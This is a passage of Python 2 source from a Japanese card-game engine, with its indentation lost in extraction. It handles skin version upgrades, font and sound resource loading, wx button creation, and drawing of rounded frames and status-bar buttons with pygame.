e.remove(".", e.find("Events"))
e.append(".", e_event)
e.write()
if skinversion <= 9:
fpath1 = u"Data/SkinBase/Resource/Xml/Animation/Opening.xml"
fpath2 = cw.util.join_paths(self.skindir, u"Resource/Xml/Animation/Opening.xml")
if not os.path.isfile(fpath2):
dpath = os.path.dirname(fpath2)
if not os.path.isdir(dpath):
os.makedirs(dpath)
shutil.copy2(fpath1, fpath2)
update = True
if skinversion <= 11:
# 学園バリアントに限り、BGMに`.mid`でない拡張子のファイルが含まれているので
# エディタのスキン付属リソース拡張子自動変換を支援するため、情報を付加する
if data.gettext("Property/Type", "") == "School":
fpath = cw.util.join_paths(self.skindir, u"Bgm/chime.mp3")
if os.path.isfile(fpath):
e_source = data.find("Property/SourceOfMaterialsIsClassicEngine")
if e_source is None:
e_source = cw.data.make_element("SourceOfMaterialsIsClassicEngine", str(True))
data.find("Property").append(e_source)
update = True
if update:
data.edit(".", "12", "dataVersion")
data.write()
return data
finally:
cw.util.release_mutex()
def _check_skin(self):
"""
必須リソースが欠けていないかチェックする。
今のところ、全てのリソースをチェックしているのではなく、
過去のアップデートで追加されたリソースのみ確認している。
"""
dpath = cw.util.join_paths(self.skindir, u"Resource/Xml/Yado")
for fname in os.listdir(dpath):
fpath = cw.util.join_paths(dpath, fname)
id = int(cw.header.GetName(fpath, tagname="Id").name)
if id == 3:
break
else:
return u"スキンにデータバージョン「9」で導入された「初期拠点」エリアが存在しません。\n" +\
u"スキンの自動アップデートに失敗した可能性があります。\n" +\
u"手動での修復を試みるか、スキンを再導入してください。"
fpath = cw.util.join_paths(self.skindir, u"Resource/Xml/Animation/Opening.xml")
if not os.path.isfile(fpath):
return u"スキンにデータバージョン「10」で導入されたオープニングアニメーション定義が存在しません。\n" + \
u"スキンの自動アップデートに失敗した可能性があります。\n" + \
u"手動での修復を試みるか、スキンを再導入してください。"
return u""
def set_dealspeed(self, value, battlevalue, usebattle):
self.dealspeed = value
self.dealspeed = cw.util.numwrap(self.dealspeed, 0, 10)
self.dealing_scales = self.create_dealingscales(self.dealspeed)
self.dealspeed_battle = battlevalue
self.dealspeed_battle = cw.util.numwrap(self.dealspeed_battle, 0, 10)
self.dealing_scales_battle = self.create_dealingscales(self.dealspeed_battle)
self.use_battlespeed = usebattle
def get_dealspeed(self, isbattle=False):
if isbattle and self.use_battlespeed:
return self.dealspeed_battle
else:
return self.dealspeed
def create_dealingscales(self, dealspeed):
dealspeed = cw.util.numwrap(dealspeed, 0, 10)
scales_len = dealspeed + 1
dealing_scales = [
int(math.cos(math.radians(90.0 * i / scales_len)) * 100)
for i in range(scales_len)
if i
]
return dealing_scales
def get_drawsetting(self):
if self.local.important_draw or not self.skin_local.important_draw:
return self.local
else:
return self.skin_local
def get_fontsetting(self):
if self.local.important_font or not self.skin_local.important_font:
return self.local
else:
return self.skin_local
def get_inusecardalpha(self, sprite):
alpha = 210
if not sprite.alpha is None:
alpha = min(alpha, sprite.alpha)
return alpha
@property
def mwincolour(self):
return self.get_drawsetting().mwincolour
@property
def mwinframecolour(self):
return self.get_drawsetting().mwinframecolour
@property
def blwincolour(self):
return self.get_drawsetting().blwincolour
@property
def blwinframecolour(self):
return self.get_drawsetting().blwinframecolour
@property
def curtaincolour(self):
return self.get_drawsetting().curtaincolour
@property
def blcurtaincolour(self):
return self.get_drawsetting().blcurtaincolour
@property
def fullscreenbackgroundtype(self):
return self.get_drawsetting().fullscreenbackgroundtype
@property
def fullscreenbackgroundfile(self):
return self.get_drawsetting().fullscreenbackgroundfile
@property
def bordering_cardname(self):
return self.get_fontsetting().bordering_cardname
@property
def decorationfont(self):
return self.get_fontsetting().decorationfont
@property
def fontsmoothing_message(self):
return self.get_fontsetting().fontsmoothing_message
@property
def fontsmoothing_cardname(self):
return self.get_fontsetting().fontsmoothing_cardname
@property
def fontsmoothing_statusbar(self):
return self.get_fontsetting().fontsmoothing_statusbar
@property
def basefont(self):
return self.get_fontsetting().basefont
@property
def fonttypes(self):
return self.get_fontsetting().fonttypes
def is_logscrollable(self):
return self.messagelog_type <> LOG_SINGLE
def write(self):
cw.xmlcreater.create_settings(self)
@staticmethod
def wrap_volumevalue(value):
return cw.util.numwrap(value, 0, 100) / 100.0
@staticmethod
def wrap_colorvalue(r, g, b, a):
r = cw.util.numwrap(r, 0, 255)
g = cw.util.numwrap(g, 0, 255)
b = cw.util.numwrap(b, 0, 255)
a = cw.util.numwrap(a, 0, 255)
return (r, g, b, a)
def get_scedir(self, skintype=None):
if skintype is None:
skintype = self.skintype
scedir = u"Scenario"
# 設定に応じて初期位置を変更する
if self.selectscenariofromtype:
for skintype2, folder in self.folderoftype:
if skintype2 == skintype:
folder = cw.util.get_linktarget(folder)
if os.path.isdir(folder):
scedir = folder
break
return scedir
def insert_yadoorder(self, yadodirname):
seq = []
for dname, order in self.yado_order.items():
seq.append((order, dname))
self.yado_order.clear()
self.yado_order[yadodirname] = 0
o = 1
for _, dname in sorted(seq):
if dname == yadodirname:
continue
self.yado_order[dname] = o
o += 1
pass
class _MsgDict(dict):
def __init__(self):
"""
存在しないメッセージIDが指定された時に
エラーダイアログを表示するための拡張dict。
"""
dict.__init__(self)
self._error_keys = set()
def __getitem__(self, key):
if not key in self:
if not key in self._error_keys:
def func():
if cw.cwpy.frame:
s = u"メッセージID[%s]に該当するメッセージがありません。\n"\
u"デイリービルド版でこのエラーが発生した場合は、" \
u"「Data/SkinBase」以下のリソースが最新版になっていない"\
u"可能性があります。" % (key)
dlg = cw.dialog.message.ErrorMessage(None, s)
dlg.ShowModal()
dlg.Destroy()
cw.cwpy.frame.exec_func(func)
self._error_keys.add(key)
return u"*ERROR*"
return dict.__getitem__(self, key)
class Resource(object):
def __init__(self, setting):
self.setting = weakref.ref(setting)
# 現在選択しているスキンのディレクトリ
self.skindir = setting.skindir
# 各種データの拡張子
self.ext_img = cw.M_IMG
self.ext_bgm = cw.M_MSC
self.ext_snd = cw.M_SND
# システムフォントテーブルの設定
self.fontpaths = self.get_fontpaths()
self.fontnames, self.fontnames_init = self.set_systemfonttable()
# 効果音
self.init_sounds()
# システムメッセージ(辞書)
self.msgs = self.get_msgs(setting)
# wxダイアログのボタン画像(辞書)
# wxスレッドから初期化
self.buttons = ResourceTable("Button", {}.copy(), empty_wxbmp)
# カード背景画像(辞書)
self.cardbgs = self.get_cardbgs(cw.util.load_image)
self.cardnamecolorhints = self.get_cardnamecolorhints(self.cardbgs)
# wxダイアログで使う画像(辞書)
self.pygamedialogs = self.get_dialogs(cw.util.load_image)
# wx版。wxスレッドから初期化
self.dialogs = ResourceTable("Dialog", {}.copy(), empty_wxbmp)
# デバッガで使う画像(辞書)
self.pygamedebugs = self.get_debugs(cw.util.load_image, cw.s)
# wx版。wxスレッドから初期化
self.debugs = ResourceTable("Debug", {}.copy(), empty_wxbmp)
# ダイアログで使うカーソル(辞書)
# wxスレッドから初期化
self.cursors = ResourceTable("Cursor", {}.copy(), empty_wxbmp)
# 特殊文字の画像(辞書)
self.specialchars_is_changed = False
self.specialchars = self.get_specialchars()
# プレイヤカードのステータス画像(辞書)
self.statuses = self.get_statuses(cw.util.load_image)
# 適性値・使用回数値画像(辞書)
self.stones = self.get_stones()
# wx版。wxスレッドから初期化
self.wxstones = ResourceTable("Stone", {}.copy(), empty_wxbmp)
# 使用フォント(辞書)。スプライトを作成するたびにフォントインスタンスを
# 新規作成すると重いのであらかじめ用意しておく(wxスレッドから初期化)
self.fonts = self.create_fonts()
# StatusBarで使用するボタンイメージ
self._statusbtnbmp0 = {}
self._statusbtnbmp1 = {}
self._statusbtnbmp2 = {}
self.ignorecase_table = {}
cw.cwpy.frame.exec_func(self.init_wxresources)
if sys.platform <> "win32":
# FIXME: 大文字・小文字を区別しないシステムでリソース内のファイルの
# 取得に失敗する事があるので、すべて小文字のパスをキーにして
# 真のファイル名へのマッピングをしておく。
# 主にこの問題は手書きされる'*.jpy1'内で発生する。
for res in ("Table", "Bgm", "Sound", "BgmAndSound", "Resource/Image"):
resdir = cw.util.join_paths(self.skindir, res)
for dpath, dnames, fnames in os.walk(resdir):
for fname in fnames:
path = cw.util.join_paths(dpath, fname)
if os.path.isfile(path):
self.ignorecase_table[path.lower()] = path
def get_filepath(self, fpath):
if not fpath or os.path.isfile(fpath) or cw.binary.image.path_is_code(fpath):
return fpath
if self.ignorecase_table or (cw.cwpy.sdata and cw.cwpy.sdata.ignorecase_table):
lpath = fpath.lower()
if lpath in self.ignorecase_table:
fpath = self.ignorecase_table.get(lpath, fpath)
elif cw.cwpy.sdata and cw.cwpy.sdata.ignorecase_table:
fpath = cw.cwpy.sdata.ignorecase_table.get(lpath, fpath)
return fpath
def dispose(self):
for key in self.fonts.iterkeys():
if self.fonts.is_loaded(key):
font = self.fonts[key]
if isinstance(font, cw.imageretouch.Font):
font.dispose()
@property
def cardnamecolorborder(self):
if cw.cwpy.setting.bordering_cardname:
return 92
else:
return 116
def update_winscale(self):
self.init_wxresources()
def init_sounds(self):
# その他のスキン付属効果音(辞書)
self.skinsounds = self.get_skinsounds()
# システム効果音(辞書)
self.sounds = self.get_sounds(self.setting(), self.skinsounds)
def init_wxresources(self):
"""wx側のリソースを初期化。"""
# wxダイアログのボタン画像(辞書)
self.buttons = self.get_buttons()
# wxダイアログで使う画像(辞書)
self.dialogs = self.get_dialogs(cw.util.load_wxbmp)
# デバッガで使う画像(辞書)
self.debugs = self.get_debugs(cw.util.load_wxbmp, cw.ppis)
self.debugs_noscale = self.get_debugs(cw.util.load_wxbmp, lambda bmp: bmp)
# ダイアログで使うカーソル(辞書)
self.cursors = self.get_cursors()
# 適性値・使用回数値画像(辞書)
self.wxstones = self.get_wxstones()
# プレイヤカードのステータス画像(辞書)
self.wxstatuses = self.get_statuses(cw.util.load_wxbmp)
# カード背景画像(辞書)
self.wxcardbgs = self.get_cardbgs(cw.util.load_wxbmp)
def init_debugicon(self):
"""エディタ情報変更によりデバッグアイコンを再読込する"""
def func():
self.pygamedebugs = self.get_debugs(cw.util.load_image, cw.s)
cw.cwpy.exec_func(func)
self.debugs = self.get_debugs(cw.util.load_wxbmp, cw.ppis)
self.debugs_noscale = self.get_debugs(cw.util.load_wxbmp, lambda bmp: bmp)
def get_fontpaths(self):
"""
フォントパス(辞書)
"""
fontdir = "Data/Font"
fontdir_skin = cw.util.join_paths(self.skindir, "Resource/Font")
fnames = (("gothic.ttf", u"MS ゴシック"), ("gothic.ttf", u"MS UI Gothic"),
("gothic.ttf", u"MS 明朝"), ("gothic.ttf", u"MS Pゴシック"),
("gothic.ttf", u"MS P明朝"))
d = {}
self.facenames = set(wx.FontEnumerator().GetFacenames())
for fname, alt in fnames:
path = cw.util.join_paths(fontdir_skin, fname)
if not os.path.isfile(path):
path = cw.util.join_paths(fontdir, fname)
if not os.path.isfile(path):
if alt in self.facenames:
continue
else:
# IPAフォントも代替フォントも存在しない場合はエラー
raise NoFontError(fname + " not found.")
d[os.path.splitext(fname)[0]] = path
return d
@staticmethod
def get_fontpaths_s(fontdir, facenames):
d = {}
fnames = (("gothic.ttf", u"MS ゴシック"), ("uigothic.ttf", u"MS UI Gothic"),
("mincho.ttf", u"MS 明朝"), ("pgothic.ttf", u"MS Pゴシック"),
("pmincho.ttf", u"MS P明朝"))
for fname, alt in fnames:
path = cw.util.join_paths(fontdir, fname)
if not os.path.isfile(path):
if alt in facenames:
continue
else:
# IPAフォントも代替フォントも存在しない場合はエラー
raise NoFontError(fname + " not found.")
d[os.path.splitext(fname)[0]] = path
return d
@staticmethod
def install_defaultfonts(fontpaths, facenames, d):
if sys.platform == "win32":
winplatform = sys.getwindowsversion()[3]
for name, path in fontpaths.items():
fontname = cw.util.get_truetypefontname(path)
if fontname in facenames or\
fontname == u"Ume Hy Gothic" and (u"梅Hyゴシック" in facenames):
d[name] = fontname
continue
def func():
gdi32 = ctypes.WinDLL("gdi32")
if winplatform == 2:
gdi32.AddFontResourceExW.argtypes = (ctypes.c_wchar_p, ctypes.wintypes.DWORD, ctypes.c_void_p)
gdi32.AddFontResourceExW(path, 0x10, 0)
else:
gdi32.AddFontResourceW.argtypes = (ctypes.c_wchar_p)
gdi32.AddFontResourceW(path)
user32 = ctypes.windll.user32
HWND_BROADCAST = 0xFFFF
WM_FONTCHANGE = 0x001D
user32.SendMessageA(HWND_BROADCAST, WM_FONTCHANGE, 0, 0)
thr = threading.Thread(target=func)
thr.start()
if fontname:
if not d is None:
d[name] = fontname
else:
raise ValueError("Failed to get facename from %s" % name)
def set_systemfonttable(self):
"""
システムフォントテーブルの設定を行う。
設定したフォント名をフォントファイル名がkeyの辞書で返す。
"""
d = {}
if sys.platform == "win32":
Resource.install_defaultfonts(self.fontpaths, self.facenames, d)
self.facenames = set(wx.FontEnumerator().GetFacenames())
else:
d["gothic"],d["uigothic"],d["mincho"],d["pmincho"],d["pgothic"] = ((u"梅Hyゴシック",)*5)
for value in d.itervalues():
if not value in self.facenames:
raise ValueError(u"font not found: " + value)
init = d.copy()
# 設定に応じた差し替え
for basetype in d.iterkeys():
font = self.setting().local.basefont[basetype]
if font:
d[basetype] = font
return d, init
def clear_systemfonttable(self):
if sys.platform == "win32" and not sys.getwindowsversion()[3] == 2:
gdi32 = ctypes.windll.gdi32
for path in self.fontpaths.itervalues():
gdi32.RemoveFontResourceA(path)
user32 = ctypes.windll.user32
HWND_BROADCAST = 0xFFFF
WM_FONTCHANGE = 0x001D
user32.SendMessageA(HWND_BROADCAST, WM_FONTCHANGE, 0, 0)
def get_fontfromtype(self, name):
"""フォントタイプ名から抽象フォント名を取得する。"""
basename = self.setting().fonttypes.get(name, (name, "", -1, None, None, None))
basename, fontname, pixels, bold, bold_upscr, italic = basename
if basename:
fontname = self.setting().basefont[basename]
if not fontname:
fontname = self.fontnames.get(basename, "")
return fontname, pixels, bold, bold_upscr, italic
def get_wxfont(self, name="uigothic", size=None, pixelsize=None,
family=wx.DEFAULT, style=wx.NORMAL, weight=wx.BOLD, encoding=wx.FONTENCODING_SYSTEM,
adjustsize=False, adjustsizewx3=True, pointsize=None):
if size is None and pixelsize is None:
pixelsize = cw.wins(14)
fontname, _pixels, bold, bold_upscr, italic = self.get_fontfromtype(name)
if cw.UP_SCR <= 1:
if not bold is None:
weight = wx.FONTWEIGHT_BOLD if bold else wx.FONTWEIGHT_NORMAL
else:
if not bold_upscr is None:
weight = wx.FONTWEIGHT_BOLD if bold_upscr else wx.FONTWEIGHT_NORMAL
if not italic is None:
style = wx.ITALIC if italic else wx.FONTSTYLE_NORMAL
if pointsize is None:
# FIXME: ピクセルサイズで指定しないと96DPIでない時にゲーム画面が
# おかしくなるので暫定的に96DPI相当のサイズに強制変換
if not pixelsize:
pixelsize = int((1.0/72 * 96) * size + 0.5)
elif 3 <= wx.VERSION[0] and adjustsizewx3:
# FIXME: wxPython 3.0.1.1でフォントが1ピクセル大きくなってしまった
pixelsize -= 1
# BUG: フォントサイズとテキストによっては
# ツリーアイテムの後方が欠ける事がある
if (name in ("tree") or adjustsize) and 15 < pixelsize and pixelsize % 2 == 1:
pixelsize += 1
wxfont = wx.FontFromPixelSize((0, pixelsize), family, style, weight, 0, fontname, encoding)
else:
wxfont = wx.Font(pointsize, family, style, weight, 0, fontname, encoding)
return wxfont
def create_font(self, type, basetype, fontname, size_noscale, defbold, defbold_upscr, defitalic, pixelsadd=0, nobold=False):
fontname, pixels_noscale, bold, bold_upscr, italic = self.get_fontfromtype(type)
if pixels_noscale <= 0:
pixels_noscale = size_noscale
pixels_noscale += pixelsadd
if bold is None:
bold = defbold
if bold_upscr is None:
bold_upscr = defbold_upscr
if italic is None:
italic = defitalic
if nobold:
bold = False
bold_upscr = False
if cw.UP_SCR > 1:
bold = bold_upscr
return cw.imageretouch.Font(fontname, -cw.s(pixels_noscale), bold=bold, italic=italic)
def create_fonts(self):
"""ゲーム内で頻繁に使用するpygame.Fontはここで設定する。"""
# 使用フォント(辞書)
fonts = ResourceTable("Font", {}.copy(), lambda: None)
# 所持カードの使用回数描画用
t = self.setting().fonttypes["uselimit"]
fonts.set("card_uselimit", self.create_font, "uselimit", t[0], t[1], t[2], t[3], t[4], t[5])
# メニューカードの名前描画用
t = self.setting().fonttypes["cardname"]
fonts.set("mcard_name", self.create_font, "cardname", t[0], t[1], t[2], t[3], t[4], t[5])
# プレイヤカードの名前描画用
t = self.setting().fonttypes["ccardname"]
fonts.set("pcard_name", self.create_font, "ccardname", t[0], t[1], t[2], t[3], t[4], t[5])
# プレイヤカードのレベル描画用
t = self.setting().fonttypes["level"]
fonts.set("pcard_level", self.create_font, "level", t[0], t[1], t[2], t[3], t[4], t[5])
# メッセージウィンドウのテキスト描画用
t = self.setting().fonttypes["message"]
fonts.set("message", self.create_font, "message", t[0], t[1], t[2], t[3], t[4], t[5], nobold=True)
# メッセージウィンドウの選択肢描画用
t = self.setting().fonttypes["selectionbar"]
fonts.set("selectionbar", self.create_font, "selectionbar", t[0], t[1], t[2], t[3], t[4], t[5])
# メッセージログのページ表示描画用
t = self.setting().fonttypes["logpage"]
fonts.set("backlog_page", self.create_font, "logpage", t[0], t[1], t[2], t[3], t[4], t[5])
# カード枚数描画用
t = self.setting().fonttypes["numcards"]
fonts.set("numcards", self.create_font, "numcards", t[0], t[1], t[2], t[3], t[4], t[5])
# ステータスバーパネル描画用
t = self.setting().fonttypes["sbarpanel"]
fonts.set("sbarpanel", self.create_font, "sbarpanel", t[0], t[1], t[2], t[3], t[4], t[5])
# 進行状況・音量バー描画用
t = self.setting().fonttypes["sbarprogress"]
fonts.set("sbarprogress", self.create_font, "sbarprogress", t[0], t[1], t[2], t[3], t[4], t[5])
# ステータスバーボタン描画用
t = self.setting().fonttypes["sbarbtn"]
fonts.set("sbarbtn", self.create_font, "sbarbtn", t[0], t[1], t[2], t[3], t[4], t[5])
# ステータスバーボタン解説描画用
t = self.setting().fonttypes["sbardesc"]
fonts.set("sbardesc", self.create_font, "sbardesc", t[0], t[1], t[2], t[3], t[4], t[5])
# ステータスバーボタン解説の表題描画用
t = self.setting().fonttypes["sbardesctitle"]
fonts.set("sbardesctitle", self.create_font, "sbardesctitle", t[0], t[1], t[2], t[3], t[4], t[5])
# ステータス画像の召喚回数描画用
t = self.setting().fonttypes["statusnum"]
fonts.set("statusimg1", self.create_font, "statusnum", t[0], t[1], t[2], t[3], t[4], t[5])
t = self.setting().fonttypes["statusnum"]
fonts.set("statusimg2", self.create_font, "statusnum", t[0], t[1], t[2], t[3], t[4], t[5], pixelsadd=-2)
fonts.set("statusimg3", self.create_font, "statusnum", t[0], t[1], t[2], t[3], t[4], t[5], pixelsadd=-4)
t = self.setting().fonttypes["screenshot"]
fonts.set("screenshot", self.create_font, "screenshot", t[0], t[1], t[2], t[3], t[4], t[5])
return fonts
def create_wxbutton(self, parent, cid, size, name=None, bmp=None , chain=False):
if name:
button = wx.Button(parent, cid, name, size=size)
button.SetFont(self.get_wxfont("button"))
button.SetMinSize(size)
elif bmp:
if chain:
#button = wx.BitmapButton(parent, cid, bmp, style=wx.BORDER_MASK)
import wx.lib.buttons as buttons
#button = buttons.GenBitmapButton(parent, cid, None, style=wx.BORDER_NONE)
#button.SetBitmapLabel(bmp)
if size[0] == cw.wins(30):
button = buttons.GenBitmapToggleButton(parent, cid, bmp, style=wx.BORDER_NONE)
#button = wx.lib.buttons.ThemedGenBitmapToggleButton(parent, cid, bmp,
# style=wx.BORDER_NONE | wx.NO_BORDER)
else:
button = buttons.GenBitmapToggleButton(parent, cid, bmp, style=0)
button.SetBezelWidth(1)
button.SetUseFocusIndicator(False)
#button.InitColours()
#button.SetBitmapSelected(bmp)
#mask = wx.Mask(bmp, wx.BLUE)
#bmp.SetMask(mask)
else:
button = wx.BitmapButton(parent, cid, bmp)
button.SetMinSize(size)
bmp = cw.imageretouch.to_disabledimage(bmp)
button.SetBitmapDisabled(bmp)
if chain:
# ボタンを押し続けた時に一定間隔で押下イベントを発生させる
timer = wx.Timer(button)
timer.running = False
def starttimer(event):
if not timer.running:
timer.running = True
button.SetToggle(True)
btnevent = wx.PyCommandEvent(wx.wxEVT_COMMAND_BUTTON_CLICKED, button.GetId())
button.ProcessEvent(btnevent)
timer.Start(cw.cwpy.setting.move_repeat, wx.TIMER_ONE_SHOT)
def timerfunc(event):
btnevent = wx.PyCommandEvent(wx.wxEVT_COMMAND_BUTTON_CLICKED, button.GetId())
button.ProcessEvent(btnevent)
starttimer(event)
def stoptimer(event):
timer.Stop()
event.Skip()
timer.running = False
button.SetToggle(False)
def enterbutton(event):
button.SetBackgroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_INACTIVEBORDER))
def leavebutton(event):
button.SetBackgroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_BTNFACE))
stoptimer(event)
button.Bind(wx.EVT_TIMER, timerfunc)
button.Bind(wx.EVT_LEFT_DOWN, starttimer)
button.Bind(wx.EVT_LEFT_DCLICK, starttimer)
#button.Bind(wx.EVT_TOGGLEBUTTON, starttimer)
button.Bind(wx.EVT_LEFT_UP, stoptimer)
#button.Bind(wx.EVT_ENTER_WINDOW, enterbutton)
button.Bind(wx.EVT_LEAVE_WINDOW, leavebutton)
return button
def create_wxbutton_dbg(self, parent, cid, size, name=None, bmp=None):
if name:
button = wx.Button(parent, cid, name, size=size)
button.SetMinSize(size)
button.SetFont(self.get_wxfont("button", pointsize=9))
elif bmp:
button = wx.BitmapButton(parent, cid, bmp)
button.SetMinSize(size)
bmp = cw.imageretouch.to_disabledimage(bmp)
button.SetBitmapDisabled(bmp)
return button
@staticmethod
def create_cornerimg(rgb):
r, g, b = rgb
linedata = struct.pack(
"BBBB BBBB BBBB BBBB BBBB BBBB"
"BBBB BBBB BBBB BBBB BBBB BBBB"
"BBBB BBBB BBBB BBBB BBBB BBBB"
"BBBB BBBB BBBB BBBB BBBB BBBB"
"BBBB BBBB BBBB BBBB BBBB BBBB"
"BBBB BBBB BBBB BBBB BBBB BBBB",
r, g, b, 255, r, g, b, 255, r, g, b, 255, r, g, b, 255, r, g, b, 255, r, g, b, 255,
r, g, b, 255, r, g, b, 255, r, g, b, 224, r, g, b, 128, r, g, b, 68, r, g, b, 40,
r, g, b, 255, r, g, b, 224, r, g, b, 68, r, g, b, 0, r, g, b, 0, r, g, b, 0,
r, g, b, 255, r, g, b, 128, r, g, b, 0, r, g, b, 0, r, g, b, 0, r, g, b, 0,
r, g, b, 255, r, g, b, 68, r, g, b, 0, r, g, b, 0, r, g, b, 0, r, g, b, 0,
r, g, b, 255, r, g, b, 40, r, g, b, 0, r, g, b, 0, r, g, b, 0, r, g, b, 0
)
topleft = pygame.image.fromstring(linedata, (6, 6), "RGBA")
topright = pygame.transform.flip(topleft, True, False)
bottomleft = pygame.transform.flip(topleft, False, True)
bottomright = pygame.transform.flip(topleft, True, True)
return topleft, topright, bottomleft, bottomright
@staticmethod
def draw_frame(bmp, rect, color):
topleft, topright, bottomleft, bottomright = Resource.create_cornerimg(color)
pygame.draw.rect(bmp, color, rect, 1)
x, y, w, h = rect
bmp.blit(topleft, (x, y))
bmp.blit(topright, (x+w-6, y))
bmp.blit(bottomleft, (x, y+h-6))
bmp.blit(bottomright, (x+w-6, y+h-6))
Resource.draw_corneroutimg(bmp, rect)
@staticmethod
def draw_corneroutimg(bmp, rect=None, outframe=0):
outdata = struct.pack(
"BBBB BBBB BBBB BBBB BBBB BBBB"
"BBBB BBBB BBBB BBBB BBBB BBBB"
"BBBB BBBB BBBB BBBB BBBB BBBB"
"BBBB BBBB BBBB BBBB BBBB BBBB"
"BBBB BBBB BBBB BBBB BBBB BBBB"
"BBBB BBBB BBBB BBBB BBBB BBBB",
0,0,0,255, 0,0,0,255, 0,0,0,188, 0,0,0,128, 0,0,0, 0, 0,0,0, 0,
0,0,0,255, 0,0,0,128, 0,0,0, 0, 0,0,0, 0, 0,0,0, 0, 0,0,0, 0,
0,0,0,188, 0,0,0, 0, 0,0,0, 0, 0,0,0, 0, 0,0,0, 0, 0,0,0, 0,
0,0,0,128, 0,0,0, 0, 0,0,0, 0, 0,0,0, 0, 0,0,0, 0, 0,0,0, 0,
0,0,0, 0, 0,0,0, 0, 0,0,0, 0, 0,0,0, 0, 0,0,0, 0, 0,0,0, 0,
0,0,0, 0, 0,0,0, 0, 0,0,0, 0, 0,0,0, 0, 0,0,0, 0, 0,0,0, 0
)
topleft = pygame.image.fromstring(outdata, (6, 6), "RGBA")
topright = pygame.transform.flip(topleft, True, False)
bottomleft = pygame.transform.flip(topleft, False, True)
bottomright = pygame.transform.flip(topleft, True, True)
if not rect:
rect = bmp.get_rect()
x, y, w, h = rect
o = outframe
bmp.blit(topleft, (x+o, y+o), special_flags=pygame.locals.BLEND_RGBA_SUB)
bmp.blit(topright, (x+w-6-o, y+o), special_flags=pygame.locals.BLEND_RGBA_SUB)
bmp.blit(bottomleft, (x+o, y+h-6-o), special_flags=pygame.locals.BLEND_RGBA_SUB)
bmp.blit(bottomright, (x+w-6-o, y+h-6-o), special_flags=pygame.locals.BLEND_RGBA_SUB)
def _create_statusbtnbmp(self, w, h, flags=0):
"""OSネイティブなボタン風の画像を生成する。"""
try:
if sys.platform == "win32":
wxbmp = wx.EmptyBitmapRGBA(w, h)
dc = wx.MemoryDC(wxbmp)
render = wx.RendererNative.Get()
#下地のみ常に選択中カラーにする
if w > cw.s(600):
flags = wx.CONTROL_PRESSED
render.DrawPushButton(cw.cwpy.frame, dc, (cw.s(0), cw.s(0), w, h), flags)
dc.EndDrawing()
wximg = wxbmp.ConvertToImage()
pixel_num = w * h
if wximg.GetAlphaData() == "\x00" * pixel_num:
wximg.SetAlphaData("\xFF" * pixel_num)
wxbmp = wximg.ConvertToBitmap()
def conv2surface(wxbmp):
"""wx.Bitmapをpygame.Surfaceに変換する。
wxbmp: wx.Bitmap
"""
w, h = wxbmp.GetSize()
wximg = wxbmp.ConvertToImage()
if wxbmp.HasAlpha():
data = wximg.GetData()
r_data = data[2::3]
g_data = data[2::3]
b_data = data[2::3]
a_data = wximg.GetAlphaData()
seq = []
for cnt in xrange(w * h):
seq.append((r_data[cnt] + g_data[cnt] + b_data[cnt] + a_data[cnt]))
buf = "".join(seq)
image = pygame.image.frombuffer(buf, (w, h), "RGBA").convert_alpha()
else:
wximg = wxbmp.ConvertToImage()
buf = wximg.GetData()
image = pygame.image.frombuffer(buf, (w, h), "RGB").convert()
if wximg.HasMask():
image.set_colorkey(wximg.GetOrFindMaskColour(), RLEACCEL)
return image
return conv2surface(wxbmp)
except:
pass
topleft, topright, bottomleft, bottomright = Resource.create_cornerimg((208, 208, 208))
def subtract_corner(value):
# 角部分の線の色を濃くする
color = (value, value, value, 0)
topleft.fill(color, special_flags=pygame.locals.BLEND_RGBA_SUB)
topright.fill(color, special_flags=pygame.locals.BLEND_RGBA_SUB)
bottomleft.fill(color, special_flags=pygame.locals.BLEND_RGBA_SUB)
bottomright.fill(color, special_flags=pygame.locals.BLEND_RGBA_SUB)
#bmp = pygame.Surface((w, h)).convert_alpha()
if flags & SB_DISABLE:
r1 = g1 = b1 = 240
bmp.fill((r1, g1, b1))
r1 = g1 = b1 = 250
bmp.fill((r1, g1, b1))
# 枠の部分。四隅には角丸の画像を描写する
if flags & SB_PRESSED:
# 押下済みの画像であれば上と左の縁を暗くする
if not (flags & SB_CURRENT):
subtract_corner(8)
color = (200, 200, 200)
else:
color = (208, 208, 208)
pygame.draw.line(bmp, color, (2, 3), (w-4, 3))
subtract_corner(8)
bmp.blit(topleft, (2, 3))
bmp.blit(topright, (w-6-1, 3))
if not (flags & SB_CURRENT):
color = (192, 192, 192)
else:
color = (200, 200, 200)
pygame.draw.rect(bmp, color, (2, 2, w-3, h-3), 1)
bmp.blit(topleft, (2, 2))
bmp.blit(topright, (w-6-1, 2))
bmp.blit(bottomleft, (2, h-6-1))
subtract_corner(64)
color = (128, 128, 128)
elif flags & SB_DISABLE:
subtract_corner(16)
color = (192, 192, 192)
else:
subtract_corner(72)
color = (128, 128, 128)
if flags & SB_EMPHASIZE:
# 線の色を赤くする
emcolor = (0, 128, 128, 0)
topleft.fill(emcolor, special_flags=pygame.locals.BLEND_RGBA_SUB)
topright.fill(emcolor, special_flags=pygame.locals.BLEND_RGBA_SUB)
bottomleft.fill(emcolor, special_flags=pygame.locals.BLEND_RGBA_SUB)
bottomright.fill(emcolor, special_flags=pygame.locals.BLEND_RGBA_SUB)
color = (color[0], max(0, color[1]-128), max(0, color[2]-128))
emcolor = (96, 0, 0, 0)
topleft.fill(emcolor, special_flags=pygame.locals.BLEND_RGBA_ADD)
topright.fill(emcolor, special_flags=pygame.locals.BLEND_RGBA_ADD)
bottomleft.fill(emcolor, special_flags=pygame.locals.BLEND_RGBA_ADD)
bottomright.fill(emcolor, special_flags=pygame.locals.BLEND_RGBA_ADD)
color = (min(255, color[0]+96), color[1], color[2])
if not (flags & SB_CURRENT) and not (flags & SB_DISABLE):
opacity = 92
lightcolor = (0, 0, 0, opacity)
topleft.fill(lightcolor, special_flags=pygame.locals.BLEND_RGBA_SUB)
topright.fill(lightcolor, special_flags=pygame.locals.BLEND_RGBA_SUB)
bottomleft.fill(lightcolor, special_flags=pygame.locals.BLEND_RGBA_SUB)
bottomright.fill(lightcolor, special_flags=pygame.locals.BLEND_RGBA_SUB)
linecolor = (color[0], color[1], color[2], 255-opacity)
else:
linecolor = color
pygame.draw.rect(bmp, linecolor, (1, 1, w-2, h-2), 1)
bmp.blit(topleft, (1, 1))
bmp.blit(topright, (w-6-1, 1))
bmp.blit(bottomleft, (1, h-6-1))
bmp.blit(bottomright, (w-6-1, h-6-1))
if not (flags & SB_PRESSED):
# ハイライトをつける
linedata = struct.pack(
"BBBB BBBB BBBB BBBB BBBB BBBB"
